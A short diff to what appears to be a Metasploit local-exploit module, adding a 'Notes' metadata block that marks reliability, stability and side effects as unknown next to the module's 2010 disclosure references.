@@ -42,7 +42,12 @@ class MetasploitModule < Msf::Exploit::Local
           [ 'EDB', '11199' ],
           [ 'URL', 'https://seclists.org/fulldisclosure/2010/Jan/341' ]
         ],
-        'DisclosureDate' => '2010-01-19'
+        'DisclosureDate' => '2010-01-19',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
       )
     )
   end
